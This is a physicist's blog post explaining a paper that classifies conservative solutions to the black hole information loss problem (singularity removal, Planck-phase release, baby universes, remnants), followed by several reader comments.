PINK1 accumulation \[[@B181-cells-09-00150]\]. Mitophagy can be restored in these cells by overexpression of Parkin, as reflected by decreased PINK1 and the recovery of Δψ~m~ coupled with reduced retention of defective mitochondria. Therefore, these findings indicate that impaired mitochondrial function and abnormal retention of dysfunctional mitochondria could be attributed to mitophagy defects in AD neurons. In addition, cardiolipin cluster-organized profile was shown to be lost in synaptic mitochondria purified from AD mouse models \[[@B182-cells-09-00150]\], occurring at the early disease stages and before nonsynaptic mitochondrial defects. This data suggests the possibility that cardiolipin-mediated mitophagy might be deficient in AD. The degradation capacity of lysosomes is critical for mitophagic clearance, and defects in lysosomal proteolysis of autophagic cargoes can also impair the mitophagy function. Lysosomal deficit is a prominent feature in AD brains, linked to the pathogenesis of AD. Suppression of lysosomal proteolysis in wild-type (WT) mice was shown to mimic neuropathology of AD and exacerbate autophagic pathology and amyloidogenesis in AD mouse models \[[@B183-cells-09-00150],[@B184-cells-09-00150]\]. Presenilin 1 mutations along with ApoE4, a key genetic risk factor of AD, are thought to disrupt lysosomal function \[[@B185-cells-09-00150]\]. 
Other factors, including Aβ peptides, phospho-tau, ROS, and oxidized lipids and lipoproteins, could also impair lysosomal proteolysis and result in a toxic accumulation, thus triggering apoptosis and neuronal death in AD. Our recent study proposes that AD-linked lysosomal deficit is also attributed to defects in protease targeting to lysosomes \[[@B186-cells-09-00150]\]. It is known that newly synthesized protease precursors need to be delivered from the trans-Golgi network (TGN) to the endo-lysosomal system for maturation, a process that relies on the presence of cation-independent mannose 6-phosphate receptor (CI-MPR) at the Golgi. The retromer complex mediates the retrieval of CI-MPR from late endosomes to the TGN and thus facilitates the trafficking of proteases to late endosomes and lysosomes \[[@B187-cells-09-00150]\]. Our study reveals that retromer dysfunction and defective CI-MPR recycling to the Golgi lead to defects in protease targeting to lysosomes. As a result, protease deficit within lysosomes impedes lysosomal proteolysis of defective mitochondria along with other autophagic cargoes in AD neurons \[[@B186-cells-09-00150]\]. Therefore, increased Parkin association with mitochondria, autophagic accumulation, as well as abnormal mitochondrial retention within lysosomes observed in AD neurons of patient brains and in cultured cells overexpressing mutant APP could also represent lysosomal deficiency \[[@B74-cells-09-00150],[@B186-cells-09-00150]\]. Taken together, these observations indicate that defective mitophagy is likely involved in AD-linked neurodegeneration. Pathogenic truncation of tau could impair mitophagy function. A recent work reported a stable association of an NH2-htau fragment with Parkin and Ubiquitin-C-terminal hydrolase L1 (UCHL-1) in cellular and animal AD models and human AD brains, leading to enhanced mitochondrial recruitment of Parkin and UCHL-1 and thus improper mitochondrial turnover \[[@B188-cells-09-00150]\]. Mitophagy suppression can restore synaptic mitochondrial density and partially, but significantly, protect against neuronal death induced by this NH2-htau. In contrast, another study proposed that human wild type tau (htau) is inserted into the mitochondrial membrane, thus inducing mitophagy impairment \[[@B189-cells-09-00150]\]. However, in a more recent study, both htau and htauP301L were shown to impair mitophagy in *Caenorhabditis elegans* (*C. elegans*) and neuroblastoma cells by reducing Parkin translocation onto mitochondria through a different mechanism. Instead of changes in the Δψ~m~ or the cytoskeleton, impaired Parkin recruitment to mitochondria is proposed to be caused by tau-mediated sequestration of Parkin in the cytosol \[[@B190-cells-09-00150]\]. Collectively, these data suggest that mitophagy is impaired under tauopathy conditions by distinct mechanisms. In addition to defects in mitophagic clearance in response to Aβ and tau-induced mitochondrial damage, a recent study reveals a marked decrease in the basal level of mitophagy in postmortem hippocampal tissues from AD patients, cortical neurons derived from AD-induced pluripotent stem cell (iPSC), as well as AD mouse models \[[@B191-cells-09-00150]\]. This study further demonstrates defects in the activation of ULK1 and TBK1, the autophagy proteins that mediate autophagy/mitophagy initiation, thus leading to impaired mitophagy function. 
Furthermore, pharmacological reinstallation of mitophagy mitigates amyloid and tau pathologies, resulting in beneficial effects against memory loss in these AD mice. Therefore, these data support the view that defective mitophagy is likely an early event in AD brains and plays a causative role in the development of AD-linked neuropathology \[[@B191-cells-09-00150]\]. Further studies using neurons derived from iPSCs of sporadic AD or other similar models could be critical for addressing whether mitophagy dysfunction serves as a key player in Aβ/tau proteinopathies. 4.2. Mitophagy Defects in PD {#sec4dot2-cells-09-00150} ---------------------------- Dysfunctional mitophagy is closely linked to PD. Many PD-causing genes show mitochondrial phenotypes \[[@B28-cells-09-00150],[@B137-cells-09-00150],[@B150-cells-09-00150],[@B192-cells-09-00150],[@B193-cells-09-00150],[@B194-cells-09-00150],[@B195-cells-09-00150],[@B196-cells-09-00150],[@B197-cells-09-00150]\]. In addition, PD patients have increased rates of mtDNA deletion in the substantia nigra, which further associates defective mitochondrial quality control with PD \[[@B198-cells-09-00150]\]. The important role for mitophagy in PD was first indicated by an ultrastructural study showing autophagic accumulation of mitochondria in neurons of patients with PD and Lewy Body Dementia (LBD) \[[@B83-cells-09-00150]\]. Many other studies have demonstrated mitophagy abnormalities in a variety of experimental models representing genetic and toxic-environmental forms of PD \[[@B67-cells-09-00150],[@B199-cells-09-00150],[@B200-cells-09-00150],[@B201-cells-09-00150],[@B202-cells-09-00150]\]. As previously discussed (see [Section 2.1](#sec2dot1-cells-09-00150){ref-type="sec"}), cell-based and mechanistic studies directly link PINK1 and Parkin to mitophagy. However, while loss-of-function mutations in *PARK6* (encoding PINK1) and *PARK2* (encoding Parkin) genes are linked to familial PD \[[@B203-cells-09-00150]\], the role of the PINK1-Parkin-dependent pathway in vivo remains elusive. The PINK1 and Parkin pathway has been extensively studied in *Drosophila*. Mutant flies show dopaminergic degeneration, reduced lifespan, and locomotive defects \[[@B28-cells-09-00150],[@B44-cells-09-00150],[@B204-cells-09-00150],[@B205-cells-09-00150],[@B206-cells-09-00150]\]. Muscle cells of mutant flies exhibited swollen mitochondria with disrupted cristae, coupled with muscle degeneration \[[@B206-cells-09-00150],[@B207-cells-09-00150],[@B208-cells-09-00150],[@B209-cells-09-00150]\]. *PARK6* KO rats showed dopaminergic loss and motor defects \[[@B210-cells-09-00150]\]. Importantly, both *Drosophila* and rat model systems show mitochondrial dysfunction. However, mice with the deletion of *PARK6* or *PARK2* do not exhibit robust, substantial PD-relevant phenotypes \[[@B77-cells-09-00150],[@B79-cells-09-00150],[@B80-cells-09-00150],[@B81-cells-09-00150]\]. This might be due to compensation by other mechanisms that is sufficient to maintain neuronal homeostasis under physiological conditions. Strikingly, when crossing *PARK2* KO mice with Mutator mice characterized by accelerated acquisition of mtDNA mutations, the resulting mice exhibit mitochondrial defects as well as dopaminergic neuronal loss \[[@B211-cells-09-00150]\]. Thus, this observation suggests that Parkin-mutant mice are susceptible to increased mtDNA damage. 
Given that both impaired mitochondrial function and mitophagy deficit lie upstream of neurodegeneration, the lack of robust phenotypes in mice suggests that the PINK1-Parkin pathway might be dispensable under physiological conditions, yet still necessary in response to stress/pathological stimuli for the functional maintenance and survival of PD-related dopaminergic neurons. Aside from PINK1-Parkin-dependent mitophagy, increased cardiolipin-mediated mitophagy was proposed to play a role in α-syn-induced mitochondrial dysfunction \[[@B148-cells-09-00150]\]. 4.3. Mitophagy Defects in ALS {#sec4dot3-cells-09-00150} ----------------------------- Impaired mitophagy was proposed to be involved in the denervation of neuromuscular junctions in an ALS mouse model \[[@B212-cells-09-00150]\]. Additionally, lysosomal dysfunction has been implicated in ALS. A recent work has provided strong evidence showing that lysosomal deficits play a critical role in autophagy/mitophagy dysfunction and mitochondrial pathology in a mutant SOD1 transgenic mouse model of ALS \[[@B213-cells-09-00150]\]. Lysosomal deficits result in abnormal accumulation of autophagic vacuoles (AVs) engulfing damaged mitochondria within motor neuron axons of mutant SOD1 mice. More importantly, rescuing autophagy-lysosomal deficits was shown to enhance mitochondrial turnover, improve motor neuron survival, and ameliorate the disease phenotype in mutant SOD1 mice. Given that autophagy/mitophagy is a lysosome-dependent pathway, defective mitophagy and mitochondrial pathology in ALS are attributed to defects in lysosomal proteolysis. A more recent study uncovered that Parkin-dependent mitophagy is activated in the mutant SOD1 mouse model of ALS \[[@B214-cells-09-00150]\]. Mitophagy activation is known to induce Parkin-triggered, UPS-mediated degradation of the mitochondrial dynamics proteins Mfn2 and Mitochondrial Rho GTPase (Miro1) \[[@B42-cells-09-00150],[@B215-cells-09-00150],[@B216-cells-09-00150],[@B217-cells-09-00150],[@B218-cells-09-00150]\]. Consistently, increased mitophagy in the spinal cord of the mutant SOD1 mice is coupled with depletion of Parkin as well as of the mitochondrial dynamics proteins Mfn2 and Miro1 that are ubiquitinated by Parkin. Interestingly, genetic ablation of *PARK2* protects against muscle denervation and motor neuron loss and attenuates the depletion of mitochondrial dynamics proteins, which delays disease progression and prolongs life span in mutant SOD1 mice. Thus, the results from this study suggest that Parkin could be a disease modifier of ALS, and that chronic activation of Parkin-dependent mitophagy augments mitochondrial dysfunction by depleting mitochondrial dynamics proteins. Consistently, several other studies also reported a significant reduction of Miro1 in spinal cord tissue of ALS patients and animal models \[[@B219-cells-09-00150]\]. Moreover, it was shown that Miro1 reduction induced by ALS-linked mutant SOD1 is dependent on Parkin \[[@B220-cells-09-00150]\]. Miro1 is known as a component of the adaptor-motor complex essential for KIF5 motors to drive anterograde transport of mitochondria along axons \[[@B8-cells-09-00150]\]. Miro1-knockout mice exhibit upper motor neuron degeneration \[[@B221-cells-09-00150]\]. Thus, the ALS-linked mitochondrial trafficking defect is likely caused by Miro1 deficiency as a result of Parkin-dependent enhancement of Miro1 turnover \[[@B220-cells-09-00150]\]. Compromised mitophagy may also induce ALS. 
Many of the genes linked to ALS encode proteins that play a critical role in autophagy/mitophagy, including OPTN and p62, as well as their kinase TBK1 \[[@B222-cells-09-00150],[@B223-cells-09-00150],[@B224-cells-09-00150]\]. However, it is poorly understood how the mutations in these genes are involved in the ALS pathology. Given the phosphorylation of OPTN and p62 by TBK1 to activate autophagy/mitophagy, aberrant accumulation of misfolded proteins and protein aggregates along with impaired mitochondrial turnover may both contribute to ALS-linked mitochondrial dysfunction and motor neuron death. Illuminating the role of these proteins in vivo will be critical in dissecting the molecular and cellular mechanisms leading to axonal degeneration and motor neuron loss. 4.4. Mitophagy Defects in HD {#sec4dot4-cells-09-00150} ---------------------------- Mitochondrial dysfunction and autophagy failure have been linked to the pathogenesis of HD. Mutant Htt is known to be associated with mitochondria and to mediate mitochondrial damage. Defective mitophagy may also be involved in mitochondrial defects in HD. Decreased levels of the basal mitophagy were shown in the dentate gyrus of HD mice crossed with the mito-Keima mouse line \[[@B76-cells-09-00150]\]. In addition to its role in catalyzing the sixth step of glycolysis, a recent study proposed that GAPDH functions in micro-mitophagy---the direct engulfment of injured mitochondria by lysosomes \[[@B225-cells-09-00150]\]. In HD cell models, abnormal interaction of long polyQ tracts with mitochondrial GAPDH impairs GAPDH-mediated mitophagy, leading to mitochondrial dysfunction and increased cell death. Additionally, mutant Htt can interact with and affect the autophagy machinery \[[@B226-cells-09-00150]\]. A primary defect in the ability of autophagosomes to recognize and recruit cytosolic cargoes was reported in HD cells, leading to inefficient autophagic engulfment of substrates including mitochondria. Such a defect contributes to HD-associated accumulation of abnormal mitochondria \[[@B227-cells-09-00150]\]. Moreover, Htt was proposed to act as a scaffold protein for autophagy through the physical interaction of Htt with p62 and ULK1 proteins. This interaction allows Htt to facilitate p62-mediated cargo recognition efficiency, in particular, associating Lys-63-linked ubiquitin-modified substrates with LC3-II---the integral component of phagophore or isolation membranes. Thus, this study supports the possibility that polyQ expansion might compromise the role of Htt in autophagy \[[@B228-cells-09-00150]\]. Given the evidence for HD-linked autophagy impairment and mitophagic pathology, investigations into mitophagy status as well as detailed mechanisms are important for better understanding of HD pathogenesis. 5. Mitophagy-Targeted Therapeutic Interventions {#sec5-cells-09-00150} =============================================== From the above stated, it is clear that mitochondrial damage is a hallmark of major neurodegenerative diseases. Pharmacological agents that induce mitophagy with a goal of enhancing clearance of damaged mitochondria could be a promising strategy for achieving a significant therapeutic benefit \[[@B7-cells-09-00150],[@B98-cells-09-00150],[@B229-cells-09-00150],[@B230-cells-09-00150]\]. 
Several mitophagy inducers, including NAD^+^ precursors, urolithin A (UA), the antibiotic actinonin (AC), and spermidine \[[@B231-cells-09-00150],[@B232-cells-09-00150]\], have been examined and shown significant benefits in enhancing mitophagy, increasing mitochondrial resistance to oxidative stress, prolonging health span, and protecting neurons in disease animal models and/or human cells. The levels of NAD^+^ are reduced in AD animal models, and elevation of cellular NAD^+^ levels through supplementation with NAD^+^ precursors such as nicotinamide, nicotinamide mononucleotide (NMN), and nicotinamide riboside (NR) was found to attenuate Aβ and tau pathologies and protect against cognitive dysfunction \[[@B233-cells-09-00150]\]. Such beneficial effects are attributed to the enhancement of the NAD^+^-dependent SIRT1 and SIRT3, expression of the transcription factor CREB, and enhanced activities of PI3K-Akt and MAPK/ERK1/2 \[[@B191-cells-09-00150],[@B233-cells-09-00150],[@B234-cells-09-00150],[@B235-cells-09-00150],[@B236-cells-09-00150]\]. Additionally, NAD^+^ replenishment was also shown to restore mitochondrial function and thus ameliorate dopaminergic neuron loss in iPSC and *Drosophila* models of PD \[[@B237-cells-09-00150]\]. These observations collectively indicate that interventions to sustain NAD^+^ levels might be beneficial for AD and PD patients. UA is an ellagitannin-derived metabolite and can effectively induce neuronal mitophagy in both *C. elegans* and mouse brains \[[@B191-cells-09-00150]\]. Both UA- and AC-mediated mitophagy activation is dependent on PINK1, Parkin, and NIX, and was shown to attenuate AD pathologies, inflammation, and learning and memory deficits \[[@B191-cells-09-00150]\]. Polyamines, including spermidine, can increase autophagy activity through affecting autophagy-related gene expression as well as enhance mitophagy through the mechanisms of mammalian target of rapamycin (mTOR) inhibition and 5′ AMP-activated protein kinase (AMPK) activation \[[@B232-cells-09-00150],[@B238-cells-09-00150]\]. Moreover, spermidine was shown to activate the Ataxia-Telangiectasia mutated (ATM)-dependent PINK1/Parkin signaling. Treatment with spermidine can lead to memory improvement and prolonged life span in *C. elegans*, *Drosophila*, and mice \[[@B231-cells-09-00150],[@B239-cells-09-00150]\]. Other pharmacological strategies to enhance mitophagy through inducing mild bioenergetic stress or inhibiting mTOR activity have also been proven to be beneficial in either delaying or treating AD. Mitochondrial uncoupling agents such as 2,4-dinitrophenol (DNP) were reported to stimulate autophagy and preserve neuronal function in AD animal models \[[@B240-cells-09-00150]\]. Through inducing mild bioenergetic stress and stimulating ketogenesis, 2-deoxyglucose treatment was found to protect neurons against degeneration in a mitochondrial toxin-based PD model \[[@B241-cells-09-00150]\], as well as enhance mitochondrial function and stimulate autophagic clearance of Aβ \[[@B242-cells-09-00150]\]. The mTOR inhibitor rapamycin, through enhancement of autophagy/mitophagy and AMPK activation, can induce mitochondrial clearance in a number of model organisms, including *C. elegans*, *Drosophila*, and mice \[[@B243-cells-09-00150],[@B244-cells-09-00150]\]. Rapamycin was also shown to reduce Aβ pathology and ameliorate cognitive dysfunction in a mutant APP transgenic mouse model \[[@B245-cells-09-00150]\]. 
Similar to rapamycin, metformin can also stimulate mitophagy through inhibitions of mTOR and complex I activities and activations of AMPK, SIRT1, and Parkin-dependent mitophagy \[[@B246-cells-09-00150],[@B247-cells-09-00150],[@B248-cells-09-00150]\]. Therefore, these observations collectively provide a strong rationale for future research into the compounds that can enhance mitophagy in AD models, such as UA, AC, and spermidine \[[@B76-cells-09-00150],[@B249-cells-09-00150],[@B250-cells-09-00150]\]. In addition, mitophagy enhancement through activation of Parkin could be another promising strategy in some disease models. Nilotinib was originally identified as a tyrosine kinase inhibitor, and was recently reported to increase Parkin abundance and ubiquitination potentially through enhancing Parkin recycling via the proteasome system \[[@B251-cells-09-00150]\]. Nilotinib-mediated c-ABL inhibition can also prevent tyrosine phosphorylation of Parkin, leading to the release of Parkin auto-inhibition status. Such a mechanism was demonstrated to be protective in PD models \[[@B252-cells-09-00150]\]. Moreover, chronic treatment with nilotinib in APP transgenic mice can enhance Aβ clearance through increasing the interaction of Parkin with Beclin 1 \[[@B253-cells-09-00150]\]. As for ALS and FTD, nilotinib treatment was also reported to mitigate motor and cognitive deficits in TDP-43 transgenic mice \[[@B254-cells-09-00150]\]. 6. Concluding Remarks {#sec6-cells-09-00150} ===================== Mitochondrial health is vital for cellular and organismal homeostasis, and mitochondrial defects have long been linked to the pathogenesis of neurodegenerative diseases such as AD, PD, ALS, HD, and others. However, it is still unclear whether cellular mechanisms required for the maintenance of mitochondrial integrity and function are deficient in these diseases, thus exacerbating mitochondrial pathology. The quality control of mitochondria involves multiple levels of strategies to protect against mitochondrial damage and maintain a healthy mitochondrial population within cells. In neurons, mitophagy serves as a major pathway of the quality control mechanisms for the removal of aged and defective mitochondria through lysosomal proteolysis. The molecular and cellular mechanisms that govern mitophagy have been extensively studied in the past decade. However, mitophagy deficit has only been recognized recently as a key player involved in aging and neurodegeneration. Given the fact that mitochondrial deficit is clearly linked to neuronal dysfunction and the exacerbation of disease defects, protection of mitochondrial function could be a practical strategy to promote neuroprotection and modify disease pathology. Mitochondrially targeted antioxidants have been proposed. In particular, the antioxidant MitoQ, a redox active ubiquinone targeted to mitochondria, has been examined and demonstrated to have positive effects in multiple models of aging and neurodegenerative disorders \[[@B255-cells-09-00150],[@B256-cells-09-00150],[@B257-cells-09-00150],[@B258-cells-09-00150]\]. Importantly, mitophagy could be another promising target for drug discovery strategy. Therefore, further detailed studies to elucidate mitophagy mechanisms not only advance our understanding of the mitochondrial phenotypes and disease pathogenesis, but also suggest potential therapeutic strategies to combat neurodegenerative diseases. The authors thank L. Turkalj and J. 
Cheung for editing and other members of the Cai laboratory for their assistance and discussion. In addition to the cited references in the manuscript, we apologize for not being able to include and discuss other relevant studies due to the space limitation. Q.C. conceived ideas and wrote the manuscript. Y.Y.J. contributed to some sections related with AD. Q.C. is responsible for funding acquisition. All authors have read and agreed to the published version of the manuscript. This work was funded by the National Institutes of Health (NIH) grants NS089737 and NS102780. The authors declare no conflict of interest. ![The mitophagy pathways. Upon mitochondrial damage, mitophagy can be induced through three major mechanisms: ubiquitin-mediated mitophagy including PTEN-induced putative kinase protein 1 (PINK1)-Parkin-dependent mitophagy, outer mitochondrial membrane (OMM) receptor-mediated mitophagy, and lipid-mediated mitophagy. (**a**) PINK1-Parkin-mediated mitophagy initiates with PINK1 stabilization on the OMM of damaged mitochondria to recruit Parkin, an E3 ubiquitin ligase. Phospho-ubiquitination of substrates on the OMM by PINK1/Parkin recruits the autophagy machinery and thus promotes the engulfment of damaged mitochondria by growing phagophore or isolation membranes. (**b**) Other E3 ubiquitin ligases have been reported to regulate mitophagy independent of PINK1 and Parkin. MUL1 has similar substrates to Parkin and can directly bind to GABAA receptor-associated protein (GABARAP), suggesting that MUL1 can function independently to facilitate autophagic engulfment. (**c**) Several autophagy receptors are anchored within the OMM, including NIP3-like protein X (NIX; also known as BNIP3L), FUN14 domain containing 1 (FUNDC1), and FK506 Binding Protein 8 (FKBP8). Binding of NIX/BNIP3L or FUNDC1 to LC3 or GABARAP on the phagophore mediates targeting dysfunctional mitochondria for autophagy. (**d**) Externalization of cardiolipin, normally found in the inner mitochondrial membrane (IMM) phospholipid, to the OMM is a unique mechanism for lipid-mediated mitophagy. Cardiolipin initiates mitophagy through its direct interaction with LC3.](cells-09-00150-g001){#cells-09-00150-f001} ![Neuronal mitophagy. Upon mitochondrial membrane potential (Δψ~m~) dissipation, Parkin is recruited to depolarized mitochondria, triggering mitochondrial engulfment by autophagosomes. Parkin-targeted mitochondria accumulate in the somatodendritic regions of neurons. Such compartmental restriction is attributed to altered mitochondrial motility along axons, as evidenced by decreased anterograde transport and relatively increased retrograde transport of mitochondria. This spatial process allows neurons to efficiently remove damaged mitochondria from axonal terminals and facilitate mitophagic clearance in the soma, where mature lysosomes are mainly located. Studies have also shown that autophagosomes containing engulfed mitochondria move in an exclusively retrograde direction from distal axons toward the soma for maturation and for more efficient cargo degradation within acidic lysosomes in the soma. Figure is modified from \[[@B2-cells-09-00150]\].](cells-09-00150-g002){#cells-09-00150-f002} ![Neurodegenerative disease-associated mitochondrial toxicity. 
Misfolded proteins, oligomers, protein aggregates, or fibrils linked to major neurodegenerative diseases induce mitochondrial abnormalities, leading to increased reactive oxygen species (ROS) levels, loss of mitochondrial membrane potential (Δψ~m~), decreased oxidative phosphorylation (OXPHOS) and ATP production, impaired Ca^2+^ buffering, and enhanced mitochondrial DNA (mtDNA) changes. Moreover, impairments in mitochondrial dynamics and trafficking as well as mitophagy result in excessive mitochondrial fission and fragmentation and aberrant accumulation of dysfunctional mitochondria, all of which collectively contribute to synaptic dysfunction, axonal degeneration, and neuronal death.](cells-09-00150-g003){#cells-09-00150-f003} ![Mitophagy defects in neurodegenerative diseases. A growing body of evidence indicates that mitophagy function is impaired in major neurodegenerative diseases. In Alzheimer's disease (AD), robust activation of Parkin-mediated mitophagy was observed in patient brains of familial and sporadic AD and in cell and animal models. However, under tauopathy conditions, either excessive or defective Parkin-dependent mitochondrial turnover has been reported, depending on the study. In addition, impaired lysosomal proteolysis and reduced levels of basal mitophagy collectively contribute to mitophagy dysfunction in AD. In Parkinson's disease (PD), PINK1-Parkin-dependent mitophagy is necessary for the function and survival of PD-related dopaminergic neurons in response to stress/pathological stimuli. The role for increased cardiolipin-mediated mitophagy in mutant α-syn-induced mitochondrial dysfunction has also been proposed. As for amyotrophic lateral sclerosis (ALS), enhanced Parkin-mediated mitophagy was demonstrated in an ALS mouse model. Mitophagy defects and mitochondrial pathology are also attributed to lysosomal deficits in ALS-affected motor neurons. In Huntington's disease (HD), decreased basal levels of mitophagy, defects in autophagic recognition and recruitment of damaged mitochondria, and impaired GAPDH-mediated micro-mitophagy lead to pathological mitophagy and mitochondrial dysfunction.](cells-09-00150-g004){#cells-09-00150-f004}
null
minipile
NaturalLanguage
mit
null
No good would come from medical split December 23, 2005 OUR OPINION We hope that Saint Joseph Regional Medical Center's plan to build a new hospital on the north side of Mishawaka does not end up splitting the medical community as some local health officials fear. Having most local physicians on the staffs at both Saint Joseph and Memorial Hospital is a convenience, both for the physicians and their patients. Physicians are familiar with both hospitals, know each one's strengths and can visit their inpatients daily. Patients can go to the hospital of their choice and still be attended by their primary care physician. However, it appears some physicians may not relish the idea of having to drive an additional five miles to get to the new Saint Joseph campus at Edison Lakes. We believe that attitude is not in the best interests of the overall health of this community. Physicians who no longer are an active member of a hospital's staff cannot tend to a patient. In most of those instances a patient's care is turned over to an in-house doctor, referred to as a hospitalist. But there is no way a hospitalist, no matter how qualified and professional, can know a patient as intimately as a primary care physician. And there are some doctors locally who are less than impressed with such a practice. We believe physicians will want to practice at the new hospital once construction is completed in mid-2009. The new Saint Joseph Regional Medical Center will be paperless and wireless, meaning information about patients can be moved around more efficiently. We think that new physical structure, accompanied by other amenities, will be an attraction to doctors. But more than a new facility, we think patients deserve to have access to the same type of medical care they have come to expect. That includes most physicians serving on the staffs of both hospitals. It is that kind of care that has set this community apart. It should continue without interruption.
null
minipile
NaturalLanguage
mit
null
Conservative solutions to the black hole information problem Our paper of this title provides a classification of solution attempts to the black hole information loss problem. As a warm-up, I recommend you read my post on the Black Hole Information Loss Paradox. You will notice that in this earlier post the basic argument of the paper is already outlined. The paper just makes the definitions more precise, and discusses the options one has to solve the problem based on how radical departures from semi-classical gravity they require. Not to mention that the paper has a lot of nice figures. We have made some effort to make the paper understandable for a broad audience, so don't be shy and download the full thing. The Core of the Problem: The Singularity The essence of the argument is the following: A singularity is something you don't want crossing your path. Why? Because infinities are dangerous. They crunch and destroy things, they literally set an end to existence, and in doing so they are indifferent as to what exactly crossed their way. A singularity is always singular. Infinity is always infinity. As such, crossing a singularity is an irreversible process. The problem is that once an initial state has ended up being singular, you can't figure out what it looked like originally. The problem with black hole information is that evolution is not unitary if you believe that the initial state of the black hole gets converted mostly into thermal radiation to excellent precision. Non-unitarity is generally considered an unappealing property because it is in conflict with quantum mechanics and can cause all kinds of nasty side-effects you don't want. But an evolution that is not reversible cannot be unitary. Reversibility is not a sufficient, but a necessary condition for unitarity. However, since irreversibility is a characteristic of the presence of singularities, the first thing you want to do to allow for a unitary evolution is to remove the singularity. Classically, this singularity is unavoidable. But we know that close to the singularity the curvature gets very strong (into the Planckian regime) and classical General Relativity (GR) is no longer valid. It should be replaced by a more fundamental theory that can be expected to remove the singularity, though the details are not well understood today. The paper offers a generalization of the classical singularities in GR that can be used for spacetimes that might have quantum gravitational regions. Throughout the paper we have tried not to make any specific assumptions about the unknown fundamental theory. The problem with the classical definition of geodesic completeness is that the notion of a geodesic, which relies on the presence of a metric, might not make sense any longer in the presence of strong quantum gravitational effects. The definition we are suggesting is motivated by the classical definition, and is then what I outlined above: a space-time is non-singular if evolution is time-reversible. It then follows trivially that a singular space-time generically suffers from information loss. Thus, a black hole space-time without information loss cannot be singular in the so-defined sense. If you want to understand what happens to the black hole information, the first thing you should thus do is get rid of the singularity. It is honestly a mystery to me why some people are so obsessed with the black hole horizon, believing that the horizon is the problem. The horizon is not where information gets destroyed. 
It is merely some surface where the information becomes irretrievable from the outside. Not to mention that the horizon can be at arbitrarily small background curvature. One thus shouldn't expect any quantum gravitational effects to be relevant at the horizon, and there is no reason to seek a solution there. Radical and Conservative Solutions Removing the singularity removes an obstacle to unitary evolution, but it doesn't explain how information survives. In the paper we discuss the possibilities one has if one just accepts that quantum gravitational effects are negligible until the very endstate of the evaporation. These solutions we have dubbed “conservative”. Everything else that requires non-locality on horizon scales or quantum gravitational effects in the weak curvature regime and so on, we have called “radical”. The conservative solutions can be classified into three cases. In all of them it is assumed the singularity is removed by quantum gravitational effects: The information is released in the final Planck phase, in which case there never is a real event horizon (in the paper, that's option 3). The information survives in a baby universe that disconnects from our universe (option 4A). The information survives in a permanent, massive remnant (option 4B). Most importantly, conservative solutions imply that the endstate of black hole evaporation - when the black hole has about Planck mass and Planck size - carries a (potentially arbitrarily large) amount of information. The reason is simply that, if one accepts that the semi-classical approximation holds, Hawking radiation does not carry any information (except its temperature). Thus, the information has to remain inside. We thus have an endstate that must be able to store a large amount of information, even though it has a small surface area. This speaks in particular for the surface-interpretation of the black hole entropy. Objects with these properties are known to be possible in General Relativity; we have discussed such “bags of gold” and “monsters” in a recent post. The three above-mentioned possible cases were discussed for a while in the literature, until some time in the mid 90s. There are some objections to all of them that we address in the paper. All in all, though valid objections, they are not terribly convincing. It is thus puzzling to some extent why there hasn't been more effort invested in what seem to be the most straightforward outcomes of black hole evaporation. Unfortunately, I have often had the impression these conservative solutions were abandoned prematurely for the sake of creating more fanciful radical solutions, not to say absurd speculations. A note on the definition of singularities we are using: If one had a fundamental theory to describe spacetime in the regions with strong quantum gravitational effects, one could consider other notions of singular spacetimes, for example by using divergence of operators describing the background curvature or likewise. Then there arises the question of how this definition would coincide with the one we have been using. One could imagine cases where they do not. E.g., the information of fields propagating in the background might not be sensitive to a curvature singularity, or the singularity itself could encode information. Bottomline The sane thing to do is to stick with conservative options until we are sure it's a no-go. That requires in particular understanding the properties of Planck-sized quantum gravitational objects with high entropy. 
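As an aside (a back-of-the-envelope illustration of my own, not an argument taken from the paper), one can put rough numbers to this endstate problem using the standard semi-classical formulas for the Hawking temperature and the Bekenstein-Hawking entropy:

\[
% Standard semi-classical results; the numerical value of T_H is for a solar-mass black hole.
T_H = \frac{\hbar c^3}{8\pi G M k_B} \approx 6\times 10^{-8}\,\mathrm{K}\,\frac{M_\odot}{M},
\qquad
S_{BH} = \frac{k_B c^3 A}{4 G \hbar} = 4\pi k_B \left(\frac{M}{m_{Pl}}\right)^{2}.
\]

For a Planck-mass endstate, M ≈ m_Pl, the horizon entropy is only of order one, while the information that went in during the evaporation can be arbitrarily large if the radiation was thermal all along. That mismatch between a tiny surface and a potentially huge information content is exactly why the conservative options point to objects with a small area but a large interior volume, the “bags of gold” mentioned above.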
210 comments: Thanks so much for expanding the explanation of your paper. It does go a long way to increasing my understanding of what you’re proposing. I must say that I agree that the removing of the singularity seems to be a priority since no physical theory has advanced very far when faced with infinities that resist being discarded or rather a method found to work around them, such as renormalization represents as being in the advances of quantum theory such as quantum electrodynamics and all the other advances since. “It is honestly a mystery to me why some people are so obsessed with the black hole horizon, believing that the horizon is the problem. The horizon is not where information gets destroyed. It is merely some surface where the information becomes irretrievable from the outside.” The above was one of my favourite statements for I too have often wondered what all the fuss about the horizon was. It amounts to imagining that an efficient thermos bottle has serious consequences in relation to the second law, since we can’t observe or be certain of the temperature of its contents. As far as I’m concerned the event horizon represents to be no more then the most ideal bottle. With or without Hawking radiation it’s arbitrary to consider what’s inside the horizon to not being part of the system. Even in the classical view if one was to pass through it and look back the universe would be visible to remain, although the rate of its evolution relatively hastened. So how does this suggest a detachment as only reaching the singularity could accomplish that. In the end like has been demonstrated in the standard model there are different stages in the resistance to gravitational collapse and I see this last one as being no different, just not understood to be explained. The one thing they share in common is that they are all dependant on the initial mass and the time required to evolve. My crude way of looking at it (and perhaps naïve)is the only way to end up with an infinity is to begin with one. In this case that would be to say that the only way to realize an infinite density is to begin with infinite mass. Bee - It is honestly a mystery to me why some people are so obsessed with the black hole horizon, believing that the horizon is the problem. Maybe it's because the existence of the horizon is what removes information from our universe. No horizon, no paradox. You could blame it on the singularity, but what's the point if singularities probably don't exist? The horizon is only non-special for an observer already committed to passing through it - the free falling observer. For an observer capable of getting close and then retreating, it's a hell whose temperature (due to the Hawking effect) is asymptotic to infinity. Isn't that true? Sorry I forgot to add that my favourite scenario is that through Hawkings’ mechanism or something else that all the classical entropy (heat) be allowed to escape (return) leaving what remains to have between itself and what’s released as potential. That’s because it is potential that amounts to be the driving force of any system. So in this way perhaps black holes are the realization of Maxwell’s demon that permits a continuance of it all. when I said that every fermion could be a bag of gold I thought, primarily, on the electron. When you renormalize a charge, you can say that a screening of virtual electrons that shields your detector from finding an infinite charge. 
